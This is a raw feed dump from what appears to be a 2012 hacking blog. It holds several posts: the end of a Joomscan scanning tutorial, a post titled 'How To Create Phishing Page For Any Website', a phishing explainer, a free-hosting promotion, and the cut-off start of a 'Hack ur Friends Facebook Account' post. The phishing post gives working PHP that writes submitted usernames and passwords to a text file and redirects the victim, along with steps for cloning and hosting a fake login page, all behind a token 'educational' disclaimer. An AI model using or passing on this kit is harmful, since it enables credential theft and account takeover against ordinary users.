&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmy34rUPbePOom1EPNhkTGJpkS6PT6oZ4rRMxkQPtNEdCA3HMqzja8ZTQcDrdoAeoqSzqquLdgm6KGzddgHzBXyohDaONlC24z937Hurvm_DyYQKxwXGrXL_r42GTbLjGIcBtvk96RhyphenhyphenE/s1600/joomscan4.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmy34rUPbePOom1EPNhkTGJpkS6PT6oZ4rRMxkQPtNEdCA3HMqzja8ZTQcDrdoAeoqSzqquLdgm6KGzddgHzBXyohDaONlC24z937Hurvm_DyYQKxwXGrXL_r42GTbLjGIcBtvk96RhyphenhyphenE/s1600/joomscan4.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;Here it shows the Server name , checking for Anti-Scanner measure&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Courier New&#39;,Courier,monospace;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxycoXZo87FlvlQDO9zAxYfdsYjPM6Sf57g6BxF6afDvA9sjFa9DtZwoDZJIqdcFGN_T9AvB0aV3G-deFT_RIGMHC70m2JQfPD9usEvdO1NIowPEZeoJDfhHWV5hADjhK1NvkyIZaCTFQ/s1600/joomscan5.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxycoXZo87FlvlQDO9zAxYfdsYjPM6Sf57g6BxF6afDvA9sjFa9DtZwoDZJIqdcFGN_T9AvB0aV3G-deFT_RIGMHC70m2JQfPD9usEvdO1NIowPEZeoJDfhHWV5hADjhK1NvkyIZaCTFQ/s1600/joomscan5.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;In this image ,it shows fingerprinting and the XSS/CSRF Vulnerability&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;&amp;nbsp;&lt;/span&gt; &lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkcbv08OcX073ljhDJ2XRycciuNtCNb4PqryFihahI_ZFE5YygEYp_prikTRZxGbwUaT-6a_vbmIk5pqkCdZjj8Hhj74iFu4JoVu5CBAckr0kzTLsUe-P5AM_Rs_54qZegd5vRngOwSjk/s1600/joomscan6.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkcbv08OcX073ljhDJ2XRycciuNtCNb4PqryFihahI_ZFE5YygEYp_prikTRZxGbwUaT-6a_vbmIk5pqkCdZjj8Hhj74iFu4JoVu5CBAckr0kzTLsUe-P5AM_Rs_54qZegd5vRngOwSjk/s1600/joomscan6.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbmErb1aeQmhOL3RITC7LlGn1uN-JaZ-2lWjrWYhSv-B7sdeMTj8qig_4PA2H63IY8X9J1KQeBCk-C4rjzgN1zGLkBHpC0SiAR6oxFIT9oSkUM_HXqB84Yqaix_AXIYErxH_GR8vYDaKM/s1600/joomscan7.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbmErb1aeQmhOL3RITC7LlGn1uN-JaZ-2lWjrWYhSv-B7sdeMTj8qig_4PA2H63IY8X9J1KQeBCk-C4rjzgN1zGLkBHpC0SiAR6oxFIT9oSkUM_HXqB84Yqaix_AXIYErxH_GR8vYDaKM/s1600/joomscan7.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;At last ,it shows the report how many vulnerable points in the website .&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;&amp;nbsp;This is how we &amp;nbsp;can use this tool .&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style=&quot;font-size: large;&quot;&gt; This tool is best for the Web Developer to test the Security of their website .&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; color: red; text-align: left;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;NOTE: THIS ARTICLE IS JUST FOR EDUCATIONAL PURPOSE ONLY .&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;b style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;YOU YOURSELF RESPONSIBLE FOR ANY ACTIVITY&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: Georgia,&#39;Times New Roman&#39;,serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b style=&quot;color: red;&quot;&gt; &lt;/b&gt;&lt;span style=&quot;color: red;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/6825470064373086606/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/joomscan-on-backtrack-5r1.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/6825470064373086606'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/6825470064373086606'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/joomscan-on-backtrack-5r1.html' title='Joomscan On Backtrack 5R1'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcgj157cxndydVeC19UySPE7fKu5qtKlgUyTQ92ehq1bgykQQILwHf5xRUTXrxRv67MXe0pLQKKjomAbG85xv0OBTwP3P9fCryaKaC11bZPjrkON9okVePe2WJrPyl9vYErFc4RdAQgNg/s72-c/untitled.JPG" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-1662543668253524960</id><published>2012-05-25T08:01:00.001-07:00</published><updated>2013-09-04T05:23:59.201-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type='text'>How To Create Phishing Page For Any Website</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Hello Friends,&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I recived many requests from my reader for create phishing page
 for different-2 website like gmail, yahoomail, facebook, orkut, hotmail
 etc. So today I will share the phishing method, So that everyone will 
able to create phishing page as their requirements.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;
NOTE: This tutorial is Education Purpose only don’t misuse it&amp;nbsp; www.hackillusion.com will Not Hold any responsibility.&lt;/blockquote&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you are not aware with Phishing than read it first “&lt;a href=&quot;http://kuchanrajesh.blogspot.in/2012/05/what-is-phishing-and-how-its-works.html&quot;&gt;What is Phishing and How it Works?&lt;/a&gt;”&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Follow these steps for create phishing page for any website:-&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Step 1:-&lt;/strong&gt; First of all open the Website in your browser for which you want to create Phishing page.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Step 2:-&lt;/strong&gt; After open of the website copy the source code of website by right click on page and save to any name with “.html” extension.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Step 3:-&lt;/strong&gt; Now open notepad and paste the below code and 
change the “http://www.redirectwebsite.com” to the address which you 
want to redirect the user after entering of user name and password. 
Pass.txt is our database where the details are stores and save this file
 to any name with “.php” extension. Suppose we save it as &lt;strong&gt;hi.php&lt;/strong&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;
&lt;div class=&quot;csharpcode&quot;&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 1: &lt;/span&gt;&amp;lt;?php&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 2: &lt;/span&gt;header (&lt;span class=&quot;str&quot;&gt;&#39;Location: http://www.redirectwebsite.com&#39;&lt;/span&gt;);&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 3: &lt;/span&gt;$handle = fopen(&lt;span class=&quot;str&quot;&gt;&quot;pass.txt&quot;&lt;/span&gt;, &lt;span class=&quot;str&quot;&gt;&quot;a&quot;&lt;/span&gt;);&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 4: &lt;/span&gt;&lt;span class=&quot;kwrd&quot;&gt;foreach&lt;/span&gt;($_POST &lt;span class=&quot;kwrd&quot;&gt;as&lt;/span&gt; $variable =&amp;gt; $&lt;span class=&quot;kwrd&quot;&gt;value&lt;/span&gt;) {&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 5: &lt;/span&gt;   fwrite($handle, $variable);&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 6: &lt;/span&gt;   fwrite($handle, &lt;span class=&quot;str&quot;&gt;&quot;=&quot;&lt;/span&gt;);&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 7: &lt;/span&gt;   fwrite($handle, $&lt;span class=&quot;kwrd&quot;&gt;value&lt;/span&gt;);&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 8: &lt;/span&gt;   fwrite($handle, &lt;span class=&quot;str&quot;&gt;&quot;rn&quot;&lt;/span&gt;);&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 9: &lt;/span&gt;}&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 10: &lt;/span&gt;fwrite($handle, &lt;span class=&quot;str&quot;&gt;&quot;rn&quot;&lt;/span&gt;);&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 11: &lt;/span&gt;fclose($handle);&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 12: &lt;/span&gt;exit;&lt;/pre&gt;
&lt;pre&gt;&lt;span class=&quot;lnum&quot;&gt; 13: &lt;/span&gt;?&amp;gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;strong&gt;Step 4:-&lt;/strong&gt; Open a notepad and save empty notepad to “pass.txt”.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Step 5:-&lt;/strong&gt; Now Open the Source Code (Saved in step 2) and find the action tag and replace the address with &lt;strong&gt;hi.php&lt;/strong&gt; (the file which we make in step 3) and save the file.&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Step 6:-&lt;/strong&gt; Now we have create three file. Now upload all three files on the the free hosting site. (&lt;a href=&quot;http://www.000webhost.com/&quot;&gt;000webhost&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Step 7:-&lt;/strong&gt; After upload open the html file and enter fake
 user details to check this. and open the pass.txt file if you see the 
entered details here than all thing is done and if not than check all 
step again.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you face any problem than comment below.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/1662543668253524960/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/how-to-create-phishing-page-for-any.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1662543668253524960'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1662543668253524960'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/how-to-create-phishing-page-for-any.html' title='How To Create Phishing Page For Any Website'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-855224039854187604</id><published>2012-05-25T07:57:00.000-07:00</published><updated>2013-09-04T05:40:31.908-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>What is Phishing and How it’s Works?</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
We all listen about the phishing many times, but very less to know 
about it and&amp;nbsp; some of them have a little knowledge about the phishing. 
So they will infected to phishing and lost their personal details, 
username, password etc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;What is&amp;nbsp; Phishing?&lt;/strong&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
Phishing is a way of attempting to acquire sensitive&amp;nbsp; information by a
 fake page. Scammers will use such attacks to steal money and identities
 from many new victims around the world. The scammers often create a 
&quot;look-a-like&quot; webpage that is designed to resemble the target company’s 
official website.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
Most of the phishing page is spread through Emails messages with a 
link of phishing page. Links in phishing scam messages are often 
disguised to make it appear that they lead to the genuine institution 
site. The sender address of the email may also be disguised in such a 
way that it appears to have originated from the targeted company such as
 “Dear account holder” or “Dear [targeted institution] customer”. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;How Phishing&amp;nbsp; Page Works?&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
When a victim receive an email from spammers with a link of phishing 
page, and when user click on the link than the same page open as the 
link claims like as any target website, any email account etc. So when 
user fill up the username, password, personal details, account details 
etc. than these details will send to the scammers and the phishing page 
will redirects to the original page. So the user don’t understand it.&lt;br /&gt;
We take an example to better understand “The scammers will create 
phishing page and upload them to any hosting site and they use three 
files for phishing such as an html page[Phishing page], php file[all 
operation will done here] and txt file[to store password]. So when the 
user enter his personal details to the phishing page than the php file 
will save the details to the txt file and and than redirects to the 
original page.&amp;nbsp; So that when the user enter second time it successfully 
done to login and the user do not know that their details was hacked.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/855224039854187604/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/what-is-phishing-and-how-its-works.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/855224039854187604'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/855224039854187604'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/what-is-phishing-and-how-its-works.html' title='What is Phishing and How it’s Works?'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-1950013548125649005</id><published>2012-05-24T14:29:00.002-07:00</published><updated>2013-09-04T05:40:31.897-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="General"/><title type='text'>Creat Your Own Website Free For 1 Year</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h4 style=&quot;background-color: white; color: black;&quot;&gt;

&lt;span style=&quot;background-color: #fff2cc;&quot;&gt;&lt;/span&gt;



&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;h4 style=&quot;background-color: white; color: black;&quot;&gt;





&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; If You Have a Local Business in India,Then it’s Time to go online and Creat An Absolutely Free Website ...&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;h4 style=&quot;background-color: white; color: black;&quot;&gt;





&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;Get India Business Online (&lt;a href=&quot;http://indiagetonline.in/&quot;&gt;&lt;b&gt;&lt;i&gt;indiagetonline.in&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;)
 is an initiative by Google that allows you to create a professional 
services website for your business in just 15 minutes, for free.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span id=&quot;more-885&quot;&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt; This free package contains a &lt;b&gt;.IN&lt;/b&gt; domain name, &lt;b&gt;Website Hosting&lt;/b&gt;, and &lt;b&gt;Email&lt;/b&gt; for 1 year.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;background-color: white; clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://pccrack.in/mywpblog/wp-content/uploads/2012/04/domain-name_thumb.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img align=&quot;right&quot; alt=&quot;domain-name&quot; border=&quot;0&quot; height=&quot;166&quot; src=&quot;http://pccrack.in/mywpblog/wp-content/uploads/2012/04/domain-name_thumb.jpg&quot; style=&quot;background-image: none; border-color: -moz-use-text-color; border-style: none; border-width: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; title=&quot;domain-name&quot; width=&quot;213&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;It will take some simple steps to publish your website via &lt;a href=&quot;http://www.indiagetonline.in/&quot;&gt;&lt;b&gt;&lt;i&gt;www.indiagetonline.in&lt;/i&gt;&lt;/b&gt;&lt;/a&gt; and be online to get inquiries online.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;Just follow these steps-&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;&amp;nbsp;&lt;/span&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;1. Go to &lt;a href=&quot;http://www.indiagetonline.in/&quot;&gt;&lt;i&gt;&lt;b&gt;www.indiagetonline.in&lt;/b&gt;&lt;/i&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;2. Find &lt;/span&gt;&lt;b style=&quot;color: black;&quot;&gt;&lt;i&gt;&lt;a href=&quot;http://www.indiagetonline.in/getstarted&quot;&gt;&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;Get Started Link&lt;/span&gt;&lt;/a&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;3. Follow these simple steps mentioned on the Get Started page and click on &lt;b&gt;&#39;Create my free website now&#39;&lt;/b&gt;
 button.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;This button will take you to HostGator.in website where you can
 choose your wish domain availability.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;If your domain is available,&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;click on &lt;b&gt;NEXT&lt;/b&gt;. &lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;4. Fill out your business information to apply for your wish website. &lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;You get all this free for first year.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;span style=&quot;font-family: Verdana; font-size: small;&quot;&gt;For the next year, you’ll have the option to renew your services with HostGator and there would be discounts too ..!!&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/1950013548125649005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/creat-your-own-website-free-for-1-year.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1950013548125649005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1950013548125649005'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/creat-your-own-website-free-for-1-year.html' title='Creat Your Own Website Free For 1 Year'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-1350490457082289855</id><published>2012-05-24T07:45:00.002-07:00</published><updated>2013-08-24T03:35:34.166-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="BackTrack"/><title type='text'>Hack the Facebook with Backtrack 5</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; text-align: left;&quot;&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; text-align: left;&quot;&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; text-align: left;&quot;&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Courier New&#39;, Courier, monospace;&quot;&gt;&lt;b&gt;Hack ur Friends Facebook Account Using BackTrack5 ...&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;background-color: white; text-align: left;&quot;&gt;
